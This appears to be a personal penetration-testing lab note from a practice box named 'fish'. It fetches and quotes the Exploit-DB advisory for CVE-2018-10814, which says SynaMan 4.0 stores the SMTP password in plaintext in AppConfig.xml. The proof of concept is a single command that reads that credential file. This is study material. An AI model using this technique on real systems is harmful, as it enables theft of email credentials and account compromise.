InfoSec LAB

Fish_CVE-2018-10814

Created: 2 min read

CVE-2018-10814

The target SynaMan instance appears to be vulnerable to CVE-2018-10814 due to its outdated version; 4.0 While the version information has not been confirmed as it shows 2 different versions, it’s worth checking the vulnerability.

A vulnerability, which was classified as critical, has been found in Synametrics SynaMan 4.0 Build 1488. This issue affects some unknown processing of the component Password Storage. The manipulation leads to credentials management. The identification of this vulnerability is CVE-2018-10814. Local access is required to approach this attack. Furthermore, there is an exploit available.

Exploit

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ searchsploit -m windows/webapps/45387.txt ; mv 45387.txt CVE-2018-10814.txt
  Exploit: SynaMan 4.0 build 1488 - SMTP Credential Disclosure
      URL: https://www.exploit-db.com/exploits/45387
     Path: /usr/share/exploitdb/exploits/windows/webapps/45387.txt
    Codes: CVE-2018-10814
 Verified: False
File Type: ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/fish/45387.txt
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ cat CVE-2018-10814.txt  
# Exploit Author: bzyo
# CVE: CVE-2018-10814
# Twitter: @bzyo_
# Exploit Title: SynaMan 4.0 - Cleartext password SMTP settings
# Date: 09-12-18
# Vulnerable Software: SynaMan 4.0 build 1488
# Vendor Homepage: http://web.synametrics.com/SynaMan.htm
# Version: 4.0 build 1488
# Software Link: http://web.synametrics.com/SynaManDownload.htm
# Tested On: Windows 7 x86
 
Description
-----------------------------------------------------------------
SynaMan 4.0 suffers from cleartext password storage for SMTP settings which would allow email account compromise
 
Prerequisites
-----------------------------------------------------------------
Access to a system running Synaman 4 using a low-privileged user account
 
Proof of Concept
-----------------------------------------------------------------
The password for the smtp email account is stored in plaintext in the AppConfig.xml configuration file.  This file can be viewed by any local user of the system.
 
C:\SynaMan\config>type AppConfig.xml
<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
        <parameters>
                <parameter name="hasLoggedInOnce" type="4" value="true"></parameter>
                <parameter name="adminEmail" type="1" value="test@gmail.com"></parameter>
                <parameter name="smtpSecurity" type="1" value="None"></parameter>
				**truncated**
                <parameter name="smtpPassword" type="1" value="SuperSecret!"></parameter>
                <parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter>
                <parameter name="mimicHtmlFiles" type="4" value="false"></parameter>
        </parameters>
</Configuration>
 
 
 
Timeline
---------------------------------------------------------------------
05-07-18: Vendor notified of vulnerabilities
05-08-18: Vendor responded and will fix
07-25-18: Vendor fixed in new release
09-12-18: Submitted public disclosure

Exploit locally available

Interactive Graph View

Backlinks